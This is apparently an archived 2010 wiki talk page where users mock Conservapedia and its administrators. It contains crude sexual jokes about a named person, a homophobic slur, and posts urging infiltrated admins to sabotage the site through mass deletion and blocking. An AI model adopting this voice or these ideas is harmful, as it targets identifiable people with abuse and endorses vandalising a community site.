K61824Insomnia? Masturbate till you pass out 13:41, 16 April 2010 (UTC) CEASE AND DESIST[edit] - Halt your vandal attacks, we know it is you, and legal action will be taken.--TKCP (talk) 10:28, 16 April 2010 (UTC) - Lol, not a very good imitation. He usually is TK-CP with the hyphen. - π 10:30, 16 April 2010 (UTC) - I'm not sure if that in itself means it's not Tez, but the capitalised title is suspicious Tweetylet's have buttsecks 10:40, 16 April 2010 (UTC) - I thought he was only talking to us through his lawyer, just like my neighbor down back. Yes, I fight and troll people in real life too. - π 11:42, 16 April 2010 (UTC) - Fixed the odd indenting for you. CrundyTalk nerdy to me 12:15, 16 April 2010 (UTC) Totally irrelevant question in English[edit] Question on English: does "Halt your vandal attacks, we know it is you, and legal action will be taken." imply that "Halt your vandal attacks" results in "legal action will be taken", whatever those two phrases may mean? ThiehZOYG I edit like Ken! 16:28, 16 April 2010 (UTC) - Technically, I think it can be read as "halting will result in us knowing it's you, and thus legal action being taken," so yeah. It could use a semicolon or period where that first comma is. ~ Kupochama[1][2] 23:30, 16 April 2010 (UTC) - The commas are indifferent separators of clause, and there's no conjunction to suggest this is anything but a list. It's poorly written and ambiguous, in other words, and can be read equally correctly as a string of unrelated events or as a causal series.-- talk 23:38, 16 April 2010 (UTC) Best... Schlaflism... EVAR![edit] I may be behind the times, but did anyone catch this Schlafly classic a week or so back: "There is a high correlation between belief in evolution and liberal political beliefs; that correlation alone demonstrates that evolution cannot be factual." (refimg) There's the usual 2 + 2 = 4 stuff in evidence too. Anyone who can say this stuff with a straight face must be seriously unhinged. --JeevesMkII The gentleman's gentleman at the other site 12:20, 16 April 2010 (UTC) - Definitely one for the quote generator, who knows how to edit that? - π 12:35, 16 April 2010 (UTC) - I remember reading that a few days ago, but it never occurred to me how perfectly it fits the quote generator. Tetronian you're clueless 12:37, 16 April 2010 (UTC) - There's also a known correlation between those things and IQ, funny that. theist 14:00, 16 April 2010 (UTC) - I have tried to put it in (check the diffs to see where). K61824ZOYG I edit like Ken! 14:11, 16 April 2010 (UTC) - With such unbeatable logic, I believe the evolution article could be shortened quite a bit. No need for lenghty tirades about evidence for creationism when one Schlafly insight does the job just fine, eh Ken? Vulpius (talk) 19:09, 16 April 2010 (UTC) - Andy's insights are more entertaining if you remove liberals as the demonised party and replace them with Jews, blacks, or the Irish. Helps show Andy's true colours. I imagine him in a bedsheet or a homemade military uniform, blurting out his gibberish while his mum spits on a hankie and tries to clean the drool from his chin. Ask me about your mother 22:35, 16 April 2010 (UTC) - If only his mum weren't just as spittle flecked as he is. All his wingnuttery he learnt at mama's knee. --JeevesMkII The gentleman's gentleman at the other site 00:39, 17 April 2010 (UTC) Not WIGO worthy 'cause it's TK[edit] Images " ... need to be non-copyrighted,..."img Try telling Joaquin, Terry. yummy & honey(or marmalade) 15:14, 16 April 2010 (UTC) - Or even try following his own advice. There was that ice-hockey player photo which he uploaded and which was later removed. But there are many other examples, particularly among his early work at CP. I know there's a picture of a light-house from Wikimedia Commons which was GFDL (later CCSA 3.0) but he just says "from WikiCommons" as if that somehow makes it all OK. Lily Inspirate me. 16:40, 16 April 2010 (UTC) - The trick to getting GFDL images to be removed from Conservapedia is to notify the copyright holder. Have to see where this one goes. --Shagie (talk) 17:31, 16 April 2010 (UTC) Regardless of political ideology?[edit] Really? Miriel will not last long, he/she fails to display a true Conservapedian spirit! :P --Maquissar (talk) 17:09, 16 April 2010 (UTC) Hazarding a guess[edit] Who here want to hazard a guess with me that AngusT is a parodist based on his contribs? LimpWrist (talk) 20:18, 19 April 2010 (UTC) - No matter how conservatively you spin it it is always a mistake to write about anyone or anything liberal or rational on conservapedia. the conservapedia MO seems to center around censoring any conversation on uncomfortable subjects. --Opcn (talk) 20:23, 19 April 2010 (UTC) - A bit early for speculation, he hasn't even made twenty edits. And don't we have some sort of guidepolicy against outing parodists? Internetmoniker (talk) 20:56, 19 April 2010 (UTC) Can a bureaucrat please oversight this section urgently. Thank you Sleuth (talk) 21:16, 19 April 2010 (UTC) - Pardon? yummy & honey(or marmalade) 21:17, 19 April 2010 (UTC) - Don't sorry, we discuss people we're 95% sure are parodists all the time, and they never do anything about them. JacobB is still going strong. If Angus is banhammered it will be for something he does, not us. DickTurpis (talk) 21:22, 19 April 2010 (UTC) - Well if this isn't deleted quickly I'm bloody outed lol Sleuth (talk) 21:36, 19 April 2010 (UTC) - You admitted to being AngusT by requesting the deletion of this section. You should've stayed silent. -- Nx / talk 21:41, 19 April 2010 (UTC) - Ooo~ Someone broke Rule #0 of WIGO. (Never talk about possible parodists). I always thought JonB was a parodist, but eh. What do I know besides the person, right? Kettle o' fish 21:52, 19 April 2010 (UTC) - It's largely pointing out the parody that is the problem. As for admitting to being a parodist then I'm Joaquin Martinez and my brother is TK. Lily Inspirate me. 21:57, 19 April 2010 (UTC) Motherf**ker[edit] TK is trolling big nowimg (compare). - π 11:49, 16 April 2010 (UTC) - Pedantry: this should be the one comparing to. K61824Ask me for relationship advice 13:45, 16 April 2010 (UTC) - What I can't understand is why someone (anyone, really) would spend that much time trying to antagonise people. Over the Internet. The existence of TK on CP merely cements my opinion of Andrew Schlafly as the world's biggest putz. --YossarianSpeak, Memory 12:01, 16 April 2010 (UTC) - 'Cos he's a sad fuck who has no other life and gets his jollies by "proving" that he's "better/smarter" by being a bigger bully. The sad thing is that the attention he gets here only feeds his fantasies. What would really hurt him is if we ignored him. Jack Hughes (talk) 12:06, 16 April 2010 (UTC) - Well WIGOs that focus on TK being the saddest cunt in the world started getting voted down a couple of months ago. Also, whenever we have CP boycotts their traffic tends to go down a fair old bit. SJ Debaser 12:09, 16 April 2010 (UTC) - He is a sad fuck there is no doubt, but he is a sad fuck that has violated our copy-right. We only have given license for our work to be redistributed under CC-by-SA 3.0, so unless he acknowledges us and shares-alike he has violated our copy-right. - π 12:16, 16 April 2010 (UTC) - cp:DMCA Agent? larronsicut fur in nocte 12:46, 16 April 2010 (UTC) - Saddest cunt? I got a bollocking yesterday for talking about fucking him, haha Tweetylet's have buttsecks 12:47, 16 April 2010 (UTC) - Oh so that did actually happen? I thought I saw a discussion about "flooding" TK's butthole and had to go and wash my eyes out with bleach. When I got back it had gone. CrundyTalk nerdy to me 12:56, 16 April 2010 (UTC) - Yeah, I asked if people would ride him bareback if the fucked him anally. And if so, would they pull out or flood him. I don't see what's wrong with a little homosexual humour. Tweetylet's have buttsecks 13:02, 16 April 2010 (UTC) - (Crundy goes off to wash his eyes out with bleach again) CrundyTalk nerdy to me 13:14, 16 April 2010 (UTC) - TK knows he's violated our copyright, and he wants us to chase it up. Getting us involved in his latest little shit-flinging escapade would play to his trouble-making agenda. Best to ignore it, but bear in mind that TK will copyvio everything else on RW until he's riled us. Anyway, it doesn't matter - the only people in the entire world who will ever view that article are CP editors (all 6 of them) and us. ONE / TALK 13:05, 16 April 2010 (UTC) - He's obviously trying to bait us into saying anything resembling legal action in order to capitalize on his own legal threats that got him banned, and then got brought up in the larger arena of WP. It's petty and stupid, but it's pretty clear that vindictiveness is well within character. --Kels (talk) 13:58, 16 April 2010 (UTC) - Should we direct any legal threats to Andy because he's the owner of the site? K61824Monitoring virgin birth experiment 14:05, 16 April 2010 (UTC) - And I wonder why TK still copies from the vandal site, which he is threatening legal actions against. Shouldn't he assume that the contents of the vandal site consists of material baiting to, if posted on CP, will constitute vandalism? (Someone revert him with the reason "material found on vandal site"/vandalism/parody) ThiehZOYG I edit like Ken! 14:23, 16 April 2010 (UTC) - So Terry Koeckritz plagiarises another article for CP. Just like the UCLA article copied from Wikipedia his mediawiki-formatting skills let him down again. What a sad little man he is. Lily Inspirate me. 16:26, 16 April 2010 (UTC) - We should send a DMCA request to take it down or acknowledge the source. I'll try to remember how to email Trent. The thing is, it violates the copyright of everyone who contributed to the article, by it being copied to a non-CC-BY-SA site, and by it not being acknowledged. What he did is actually against the law. The easy fix is to remove it upon request. ħuman 02:02, 17 April 2010 (UTC) - Simple truth of the matter is if we are aware of a violation and fail to act we risk losing the right to maintain copyright on the work. An informal request to Andrew and Sitegrounds should be enough. I will take care of it. tmtoulouse 02:36, 17 April 2010 (UTC) - Er, no. That's how trademarks work, not copyrights. But yes, there's a lot to be said for asking nicely - David Gerard (talk) 02:51, 17 April 2010 (UTC) The original author of the article submitted it to both sites, so we both hold a unique copyright on the content. The problem arises because CP regularly erases important history through deletion and recreation. It is poor management that is for sure. tmtoulouse 06:23, 17 April 2010 (UTC) - Ah, thanks again. F'ing idiots don't know how to run a website. ħuman 06:45, 17 April 2010 (UTC) - TK knew that all along. We're just fueling the fire here. Keegscee (talk) 07:05, 17 April 2010 (UTC) - Well I guess I owe TK an apology. Sorry for accusing you of plagiarism, TK. - π 07:47, 17 April 2010 (UTC) - Let me assure he was as gracious as one would expect. tmtoulouse 07:56, 17 April 2010 (UTC) - So what we were too lazy or stupid to do was check the deletion log before panicking and stirring the slumbering giant? ħuman 08:20, 17 April 2010 (UTC) - Speaking of deleting, why do we have an article on Schlafly Brewery? Not very on mission. - π 13:59, 17 April 2010 (UTC) - Beer is inherently on-topic. Is the stuff any good? - David Gerard (talk) 20:53, 17 April 2010 (UTC) There's a first for everything[edit] JacobB made me lol!img — Sincerely, Neveruse / Talk / Block 20:27, 16 April 2010 (UTC) - To be fair, no starting entry would be appropriate though. K61824What is NOT going on? 21:49, 16 April 2010 (UTC) - That is amazing... I am not even sure where to begin on that one. --BMcP - Just an astronomy guy 22:01, 16 April 2010 (UTC) - I'm equally amazed. Making fun of Ed is like trying to accuse a thief who walks around with a mask, stripey shirt and a bag marked "swag". Our comments seem somehow unecessary. Well done JacobB! Ask me about your mother 22:44, 16 April 2010 (UTC) - Don't think JabobB has forgotten about this. Keegscee (talk) 22:47, 16 April 2010 (UTC) - Please use the capture tag - someone oversighted that edit since you posted. 23:23, 16 April 2010 (UTC) - Sorry. It was from January when Ed asked Jacob for a writing plan. I'm sure it's been captured already. Keegscee (talk) 23:45, 16 April 2010 (UTC) - It's amazing JacobB is still there at all. He was outed ages ago here as a parodist. But of course, blocking him for "liberal vandalism/parody" would, in the CPians minds be an acknowledgement of our existence (though TK's been testing that rule recently on CP). SJ Debaser 00:31, 17 April 2010 (UTC) - Trouble is Poe's Law: a good parodist is indistinguishable from the real thing, so why not let him continue adding "good" stuff until he goes berserk in frustration and then just revert his berserk stuff? yummy & honey(or marmalade) 00:35, 17 April 2010 (UTC) - We know that logic goes through their heads (see the ZB discussions), but it's utterly wrong. Any good parodist will be supplementing the utterly partisan with the utterly false. 00:44, 17 April 2010 (UTC) - Once a fact has been accepted by the Aschlafly it is true and will be defended whatever. There are no false statements on Conservapædia. yummy & honey(or marmalade) 13:34, 17 April 2010 (UTC) Jacob's endgame?[edit] Well, Jacob (and Douglas) finally made it to adminship. Any speculation about his exit strategy? The parody game has to get boring sooner or later, especially with the amount of time he puts in. He hasn't really done anything new lately (at least in public), so what's left? --Benod (talk) 23:16, 16 April 2010 (UTC) - TK's still there, which proves some parodists have the patience and lack of social lives to stay around. Maybe J & D will learn from teh über parodist? –SuspectedReplicant retire me 23:51, 16 April 2010 (UTC) - The question is, what sort of exit strategies are even possible? Pretty much anything can be undone and memory-holed. A truly spectacular exit would need some serious creativity and planning. 00:25, 17 April 2010 (UTC) - The game has changed a bit. Back in the day there was no shortage of bright eyed editors to throw in to the wood-chipper, but right now it's a very limited selection. It's quite clear that Andy doesn't need to be pushed to adopt crazy and unpopular positions, so I'd like to see some serious undermining of a major sysop, such as Ken, Ed, Karajou, or the Mexican bandit. CP deserves to go out with an explosion, and the current slow slide in to mediocrity is really selling the site short. I'd be very impressed if someone managed to drag the Schlafly broodmare in to the game. -- Ask me about your mother 00:33, 17 April 2010 (UTC) - I keep looking at the Active Editors stat. I think if that drops below Ψ, where Ψ is some value in TK's warped mind, he'll out himself. Given that there's variable ψ, which is people who edited but got blocked, (Ψ-ψ) must be approaching the critical value. –SuspectedReplicant retire me 00:51, 17 April 2010 (UTC) - Jacob and Doug have probably put a few gems in the CBP. Other than that, there's not really much they can do other than laugh in Andy's face. The only normal editor worth disposing of now is CPalmer, who has probably only survived this long because he hasn't really edited in the past half-year. The best thing they could do would be to take down TK with them; that way, CP might get some new editors, arguments would be held, and we would get to see the CP sysops in all their war finery once more. EddyP (talk) 01:10, 17 April 2010 (UTC) - I think the ideal endgame would be deleting a crapload of articles (with Andy's approval, of course) and gradually blocking the planet. That way, they can at least be sure that they did some irreparable damage to CP before they risk their own heads going after TK or someone else. Tetronian you're clueless 02:45, 17 April 2010 (UTC) - I agree. Block as many IPs as you can, insert as much gibberish as possible and defend it with blocks, maybe as a grand finale, delete and restore all the top 20 articles, thus not actually vandalising, but certainly screwing up Andy's beloved pageviews. Ideally, what every mole desires is entry into the soopah seekrit discussion group, so they can emulate Terry Koeckritz by sharing the secrets with everybody. --PsyGremlinTala! 10:21, 17 April 2010 (UTC) - Actually sorting out their images for copyvio would be awesome. Lily Inspirate me. 10:34, 17 April 2010 (UTC) Point[edit] "For a gov. to not express appreciation or acknowledge an unseen but manifest host conveys that such is unworthy of recognition, or that it is evil for them to do so, or that no host exists." Sayeth Danimg Too true, Danny boy. yummy & honey(or marmalade) 00:17, 17 April 2010 (UTC) - Actually, I don't think he's right at all. Not having a National Prayer Day does not mean that the government's official position is atheistic or agnostic - it just means that they are (correctly, in my opinion), staying away from religion so that people can decide for themselves how/when/who/if they want to worship. Tetronian you're clueless 02:48, 17 April 2010 (UTC) - I think Toasty Toes was just bring snarky about the "no host exists" part. ħuman 03:19, 17 April 2010 (UTC) - If the government is atheistic do the government hospitals become atheist hospitals? --Opcn (talk) 05:56, 17 April 2010 (UTC) - They are, that's why these conservatives wants no universal healthcare — Only Christian hospitals should provide healthcare and they should charge you a fee on top of your tithe. ThiehZOYG I edit like Kenservative! 07:07, 17 April 2010 (UTC) This won't last long[edit] So I'm saving the Stephen Tin Tin Duffyimg reference for posterior. --PsyGremlinZungumza! 13:39, 17 April 2010 (UTC) - I've been waiting for them to get to the porny bits Of the OT. yummy & honey(or marmalade) 13:46, 17 April 2010 (UTC) - Ditto. Especially Levitations and Dorubyourtummyforme with all their talk of "nocturnal emissions". --PsyGremlinSnakk! 13:53, 17 April 2010 (UTC) - Sexy stuff. Better than internet porn. SJ Debaser 13:56, 17 April 2010 (UTC) - Ha! Said by somebody who's never watched dwarf lesbian nun porn. --PsyGremlinRunāt! 14:02, 17 April 2010 (UTC) - Speaking as a dwarf lesbian nun, I find that comment offensive, Psy. yummy & honey(or marmalade) 14:08, 17 April 2010 (UTC) - But... but... it's art! PsyGremlin話しなさい 14:13, 17 April 2010 (UTC) - Heh! Googling dwarf lesbian nun gets 212,000 hits therefore it must be true. yummy & honey(or marmalade) 14:16, 17 April 2010 (UTC) - For all dwarf lesbian nun: if dwarf lesbian nun gets 212,000 hits and cowboy dwarf lesbian evolutionist nun vampire gets about 70,000 hits, then cowboy dwarf lesbian evolutionist nun vampire is approximately 1/3 as true as dwarf lesbian nun. ■ 15:16, 17 April 2010 (UTC) - cowboy dwarf lesbian evolutionist nun vampire. Now there's a film I'll watch. --PsyGremlinParlez! 15:20, 17 April 2010 (UTC) - Someone "translated" Ecclesiastes months ago, but its still languishing in the incomplete list, its like they are allergic to the entire old testament that isn't about how much fags suck, which reminds me, did anyone bother to screen cap me asking Ken where he is blowing these days? It took a lot of self control to not write "in a highway rest stop bathroom no doubt" in the edit comment. --Opcn (talk) 17:07, 17 April 2010 (UTC) Well I never...[edit] They seem to have attracted a genuine conservative judging by his blog. He seems to be operating a la Ed, bigging himself up here, or is he just a parodist who's put in extra work? Tweetylet's have buttsecks 14:05, 16 April 2010 (UTC) - Actually, in his blog he used the word 'phenomenol'. Yep, conserva-loon Tweetylet's have buttsecks 14:07, 16 April 2010 (UTC) - ... Phenomenon packaged into booze form? Thieh"6+18=24" 14:17, 16 April 2010 (UTC) - I don't care if he's a conservative or what, but creating a mainspace article about your own personal blog as your 3rd mainspace edit? Ugh.. --GTac (talk) 14:23, 16 April 2010 (UTC) - He should fit right in Tweetylet's have buttsecks 14:26, 16 April 2010 (UTC) - Note he claims to be a Native American. Wonder if he's read Roger's diatribes? yummy & honey(or marmalade) 14:37, 16 April 2010 (UTC) Interesting how he wrote the article in the future tense. Made me think it was brand new, but it's been around a couple months at least. Quickly glancing through it I think I saw only one post with any comments. Why do is expect this is not an encyclopedia-worthy blog? Also, from what I read this guy doesn't seem far-right enough for CP. For instance he admitted that some of the opposition to healthcare reform could be attributed to Conservative Deceit. [Cue spooky music] DickTurpis (talk) 15:41, 16 April 2010 (UTC) - He also uses the word "majorly". The future tense is due to him quoting the header on his blog, I think. And also, glorious dreams of future fame? ħuman 02:13, 17 April 2010 (UTC) - He also seems not to have a mother, but he does have two daddies. ħuman 02:15, 17 April 2010 (UTC) - ...and he also signs his article sections. He definitely has a future at CP. Finally, new blood! ħuman 02:16, 17 April 2010 (UTC) - TK told him to "Scott, please sign all posts."img He's taken it a bit literally. yummy & honey(or marmalade) 02:20, 17 April 2010 (UTC) - I know. Typical parodist tactic is to not sign their first talk page posts, to disguise that they have any wiki-fu. I like the way he ran with it. TK forgot to say "talk page posts". Don't they have a template yet for that? And I always love the "W with a red line through it" references. ħuman 03:13, 17 April 2010 (UTC) - The guy's phonics schpiel is copied completely from WP too - perfect conservapedophile. DeltaStarSenior SysopSpeciationspeed! 14:30, 18 April 2010 (UTC) Trim to fit on one line[edit] Andy really doesn't get how browsers, computers, displays or anything works does he?img yummy & honey(or marmalade) 23:50, 16 April 2010 (UTC) - I'm sorry, Toast (what a ridiculous name!) but your reply scrolled over one line so I was unable to read it. gODspeed –SuspectedReplicant retire me 23:52, 16 April 2010 (UTC) - It is one line for Andy, that is what is important. It is his wishes that count, TK said so. (Aside: If you want to see something bad go to NFL.com with the default Ubuntu fonts. The website must cost millions a year, but text gets chopped of the end of lines unless you are using the Windows defaults.) - π 01:56, 17 April 2010 (UTC) - As a side note, NFL.com doesn't look screwed up with a firefox/default fonts on Fedora 12, or that may be just me. K61824[Talk needed] 07:13, 17 April 2010 (UTC) - Wow, he's using a monitor that small? Even my used flaptop renders the "pre" version on one line. But then again, as used flappies go, it's pretty shiny. ħuman 02:23, 17 April 2010 (UTC) - More correctly it's the pixel resolution that counts rather than the dimensions of the monitor. I reckon he must be using one of those Hollywood style monitors where everything is displayed in a font that you can read from across the street. Lily Inspirate me. 03:53, 17 April 2010 (UTC) - True indeed. A friend of mine has a 42" or so monitor, and when he goes into command line mode each character is about 2" tall. ħuman 04:01, 17 April 2010 (UTC) - He is using too many words to describe the word "concise" in the CP sense. ThiehCP≠Child Porn? 07:13, 17 April 2010 (UTC) - Maybe that's where his obsession with conciseness comes from. It's nothing about being able to express an idea in as little words as possible, it's just that he's using some ridiculous resolution and doesn't like scrolling down a talk page. X Stickman (talk) 15:39, 17 April 2010 (UTC) - Y'all remember when he uploaded a line drawing for one of his economics 'lectures' as a 6000x4000 jpeg? For an electrical engineer (and a programmer of course!) he really doesn't have a fucking clue. Good spot Toasty. DeltaStarSenior SysopSpeciationspeed! 16:49, 18 April 2010 (UTC) ...and now it won't fit on one line...[edit] ...because Andy has put a massive imageimg on the left side of the main page. No sense of what a good layout is. RationalwikiwikiUndergroundResistor (talk) 19:25, 17 April 2010 (UTC) - "No sense of what a good layout is." Fixed that for you. --Kels (talk) 20:25, 17 April 2010 (UTC) - Also, ruthless censorship of controversial political cartoons. --wwwwolf (barks/growls) 23:44, 17 April 2010 (UTC) Ken logic[edit] Back at his best, Christian channels on YouTube being shut down for copy-right violation is a blow against atheism.img I will never cease to wonder what goes on inside his head. He must have some kind of special prism that reflects and refracts what he is reading so that it always comes out as "you are right Ken". - π 01:22, 18 April 2010 (UTC) - It seems to me that what Ken is really saying is this: Christian YouTube channels are being shut down because of copyright issues. The atheist channels are saying nothing about it. Therefore, they are the ones doing the censoring. QED. Tetronian you're clueless 01:17, 18 April 2010 (UTC) - I've never heard any atheist say "atheist" that much in a sentence. Holy (haha) balls. – Nick Heer 03:18, 18 April 2010 (UTC) - While they've always portrayed reality as a neverending string of conservative victories, "Belief in God is once again triumphant. Conservapedia has learned that Christian channels at YouTube are systematically being shut down at YouTube..." is probably the ballsiest move yet. Chapeau, Ken! Röstigraben (talk) 07:43, 18 April 2010 (UTC) - "The atheist community at YouTube demonstrates the utter futility and weakness of the atheism." Snigger. Lily Inspirate me. 09:13, 18 April 2010 (UTC) - Hey, Ken. Maybe you can strike a blow against the atheism by posting so many copyrighted Hitler pictures on Conservapedia that it gets shut down. In other news, I am impressed by the "TheCristianThinker"'s ability to spell "Christian." Thinky. --JeevesMkII The gentleman's gentleman at the other site 09:28, 18 April 2010 (UTC) - Excuse me Jeeves, but I fixed your sentence. Lily Inspirate me. 12:29, 18 April 2010 (UTC) - I like how up until this point Ken has ignored numerous DMCA and votebotting instances against atheist YouTubers, but the second a couple of Christians get shutdown he pisses himself over it. Ken's just such an unusual bloke. Even in the Zeuglodon Blue files. SJ Debaser 12:27, 18 April 2010 (UTC) - I like the ones where he posts a rambling screed, everybody ignores him and he goes on to post about 7 replies to his own mail. Very strange indeed. Still, it's good to see his writing style is as bad off-wiki as on. --PsyGremlinKhuluma! 12:30, 18 April 2010 (UTC) - What is ironic is that I discovered about some of the Christian channels being falsely DMCAed through the atheist DPRJones channel when he called for people's support for those same Christians through mirroring their videos. Ken though likely ignored that as soon as he realized it would contradict his stereotyping of atheists. Of course there was a string of false DMCAs against atheist channels not too long ago, and then there was the story of the Christian Venomfangx, who got caught and had to make a public apology. --BMcP - Just an astronomy guy 17:16, 18 April 2010 (UTC) What the fuck was this?[edit] I can see why he took it downimg--Opcn (talk) 06:28, 18 April 2010 (UTC) - i can't even see where that is in the article, he might be the one with delusional "thinking". - π 06:33, 18 April 2010 (UTC) - I can't understand what Conservative is saying. Someone translate it into English, please. Rodlen (talk) 06:35, 18 April 2010 (UTC) - "If I am not mistaken, I believe I am the principle contributor of these articles" - Bloody right Ken. They've been locked away from ordinary editors pretty much from day 1. Lily Inspirate me. 07:51, 18 April 2010 (UTC) - Oooh me me me me me! What is in that man's mind? Ummm, pudding? Gravel? The foam bits from earbud headphones? Eraser tips, OCD pills, watermelon seeds, foam. 14:02, 18 April 2010 (UTC) - Small sections of bicycle chain. ħuman 14:40, 18 April 2010 (UTC) That's disgusting. rational ghey (talk) 18:41, 18 April 2010 (UTC) - So, basically, Ken would be one of the few survivors of the upcoming zombie apocalypse. NOOOOOOOOOOOOOOOOOO! Rodlen (talk) 18:42, 18 April 2010 (UTC) - So that's the "end of atheism/evolution on internet" he's always been foaming about, zombie apocalypse? Vulpius (talk) 19:06, 18 April 2010 (UTC) I tip my hat[edit] to DouglasA. The scale on which he is destroying articles is unlike that of any parodist seen before; and he's getting away with it too. Truly he is among the masters. EddyP (talk) 15:20, 18 April 2010 (UTC) - He is quite skillful, but it's not as hard as it used to be because almost nothing is going on at CP these days. Plus, right now it's Sunday morning EST, so Andy and most of his gang are probably at church. Tetronian you're clueless 15:23, 18 April 2010 (UTC) - Unless I'm missing something, it looks like he's just deleting articles that aren't on par with conservapedia's mission. And he just translated a bible verse. Senator Harrison (talk) 15:52, 18 April 2010 (UTC) - Most of those articles were already marked for deletion. They were still up because Conservapedians are lazy by nature - I've seen stuff marked for "speedy deletion" still up months later. Yeah, it's amusing that DouglasA deleted almost 150 articles in a week, but it was all stuff that CP wanted deleted. - I do find it interesting how selective they're being with the anime articles. Only a few of them were marked for deletion, ironically the more widely-known series. I'm honestly surprised that they didn't just nuke the whole section after Jessica got the boot. Colonel of Squirrels白山羊不山羊。商讨。 16:07, 18 April 2010 (UTC) - My favorite one: cp:HeadOn. Tetronian you're clueless 16:10, 18 April 2010 (UTC) - I thought that CP's mission was to become a general encyclopaedia and destroy WP utterly. EddyP (talk) 16:15, 18 April 2010 (UTC) - It is, but I seem to remember Andy saying that he didn't want all the pop-culture and "gossip" that takes up such a sizable fraction of WP's main space. Tetronian you're clueless 16:32, 18 April 2010 (UTC) - As a large percentage of net searches will be for trivia, they'll miss out on a lot of traffic. What was that revolting Canadian dish that we were number one for, began with "P" if I remember right? I believe it brought us several new members. yummy & honey(or marmalade) 16:55, 18 April 2010 (UTC) - Just when I thought Andy couldn't get any more blind Sleuth (talk) 17:18, 18 April 2010 (UTC) - Conservapedia's law dictates that people will stop having fun as time goes on. --Opcn (talk) 17:20, 18 April 2010 (UTC) - Pretty sure the dish was donair sauce. Do we have an article on poutine at all? --Kels (talk) 17:32, 18 April 2010 (UTC) - My mistake, Kels, it was Donair sauce. Fun:PoutineRecipe:Donair sauce yummy & honey(or marmalade) 17:35, 18 April 2010 (UTC) - No offense, Canadians, but Poutine looks vile. Tetronian you're clueless 17:37, 18 April 2010 (UTC) - I like poutine. Also, that is definitely a much better Conservapedia's Law, Opcn. Rodlen (talk) 17:42, 18 April 2010 (UTC) - We just have to hope that Andy's hubris will give birth to another pet project. Tetronian you're clueless 17:43, 18 April 2010 (UTC) UD)Fun = Hollywood values; Fun = sex; Fun = Drugs; Fun = Not doing what your elders & betters tell you; Fun = Unchristian; Fun = Liberal; Fun = " I don't have fun, why should you"; etc etc etc. Ergo Fun =/= Conservapedian. yummy & honey(or marmalade) 17:53, 18 April 2010 (UTC) Ken's Sense Of Humour[edit] This carimg is apparently comedic to Ken. I don't understand. At all. Rodlen (talk) 20:08, 18 April 2010 (UTC) - And now he links to Hitwin. That, I don't find as surprising. Rodlen (talk) 20:10, 18 April 2010 (UTC) - Methinks that "Gishmobile" is not funny in the way intended by Ken. I like the "God bless america" thing on the front bumper. Perhaps the driver is hoping that God will be crossing the road in front of them and think "Wow, that's a great idea! I'll bless America!"- Ask me about your mother 20:13, 18 April 2010 (UTC) - (EC)I think the picture's funny, but probably for different reasons to Ken. The yank (obvious due to his back to front baseball cap) is shouting and pointing at a car which says, "Evolution? The Fossils Say No!" while the front bumper has the Stars and Stripes with a bald eagle and the slogan "God Bless America!" It's a kinda "YEAH! WE DON'T NEED NO DAMN SCIENCE! USA! NUMBER ONE!!" which highlights the idiocy of the American right-wing. (No offence there, America.) SJ Debaser 20:17, 18 April 2010 (UTC) - Ooh, we now have Stalwin too! Rodlen (talk) 20:19, 18 April 2010 (UTC) - He thinks it's funny because it is his firm belief that fossils say the earth is 6,000 years old or whatever. And they say no. And that's funny to the boyman. rational ghey (talk) 20:22, 18 April 2010 (UTC) - [1]img Here is the actual car if you don't want to search user:Conservative's page for ten minutes. Mei (talk) 20:34, 18 April 2010 (UTC) - Wow I Just noticed the "evolution is a fairy tale for grown-ups." .. WTF?! rational ghey (talk) 20:42, 18 April 2010 (UTC) - I just noticed Ken's page, and after a small nap to regain my senses, I had a bit of a laugh. He has a link to the classic Abbott and Costello routine about baseball. He has it named "Who is on first?" Small and stupid, I know, but still funny. SirChuckBGentoo Penguins is the best kind of Penguin 23:47, 18 April 2010 (UTC) Mass vandalism wave[edit] Check the CP recent changes. 'Nuff said Tweetylet's have buttsecks 18:22, 17 April 2010 (UTC) - This must be the most edits they've had in a day for a few months now. EDIT: are all the admins at church or something? EddyP (talk) 18:41, 17 April 2010 (UTC) - What percentage of their edit per article count is vandalism? --Opcn (talk) 18:49, 17 April 2010 (UTC) - Figures its on a saturday when all the kids are home from school.Senator Harrison (talk) 19:17, 17 April 2010 (UTC) - Figures it's on a day when I was in NYC all day. I missed creating an account and getting in on the reversions. Kix, they're not just for kids~ 21:54, 19 April 2010 (UTC) Abortion and Hitler[edit] Obvious parody is lame. -- Nx / talk 20:25, 18 April 2010 (UTC) - I know, but it remains there, as with the Obama/Osama controversy. I wrote that WIGO (I know, I have an amazing passion for creativity) and I'm not expecting much. SJ Debaser 20:27, 18 April 2010 (UTC) - Just remember that the admins requested it in their anti-abortion project. Rodlen (talk) 20:30, 18 April 2010 (UTC) - I was gonna say that the article was a good thing to WIGO but the WIGO is lame, but you acknowledged that already. Good for you, SJ. Senator Harrison (talk) 20:38, 18 April 2010 (UTC) - Is it obvious parody? It was Ken himself who requested such an article. DeltaStarSenior SysopSpeciationspeed! 21:16, 18 April 2010 (UTC) - True, but both editors who worked on that article reek of parodist. Of course, I admit that it's sometimes hard to tell. Colonel of Squirrels白山羊不山羊。商讨。 21:18, 18 April 2010 (UTC) - On a related note, I have a hard time understanding Ken's relationship with parody. Sometimes it looks like he recognizes parody for what it is, but then he'll go on to expand on the parody and take it seriously. Is he just that out of touch? (That's a rhetorical question, by the way.) Tetronian you're clueless 21:28, 18 April 2010 (UTC) - One more thing: I've been ignoring CP's latest project, so I didn't notice this until today, but Ken is alleging that they'll be vetting all the new articles. It's like they knew that they were inviting parodists to the party and decided to draw a line in the sand. My guess is that it won't matter. Ken's going to half-ass this like he does everything else, and they'll never find all the vandalism. Colonel of Squirrels白山羊不山羊。商讨。 21:36, 18 April 2010 (UTC) Thisimg made me laugh. Nice new crop of parodists over there. 21:32, 18 April 2010 (UTC) - Though that is parody, I've heard that argument used seriously on a number of occasions, including by my own father. Tetronian you're clueless 21:49, 18 April 2010 (UTC) - 'What do liberals that oppose wiretapping have to hide from the government?' -> Their dignity. Mei (talk) 21:51, 18 April 2010 (UTC) - Conservative reply: "But the government doesn't care about people's personal information, so they won't do anything with it unless it constitutes a security risk" (actual quote from a conservative friend of mine). Tetronian you're clueless 21:54, 18 April 2010 (UTC) - IT BURNS >__________________< Mei (talk) 21:56, 18 April 2010 (UTC) - My favorite part of that wiretap article is definitely the one source: it involves the arrest of police who did drugs, through the use of a wiretap. To justify the entire article. Rodlen (talk) 23:02, 18 April 2010 (UTC) - Update ♥ K e n D o l l ♥ gives it his blessingimg--Opcn (talk) 04:33, 19 April 2010 (UTC) - It seems that this has suddenly become Conservative's favorite article on the wiki, seeing how he restored it post-deletion for a reason that isn't real, and has turned 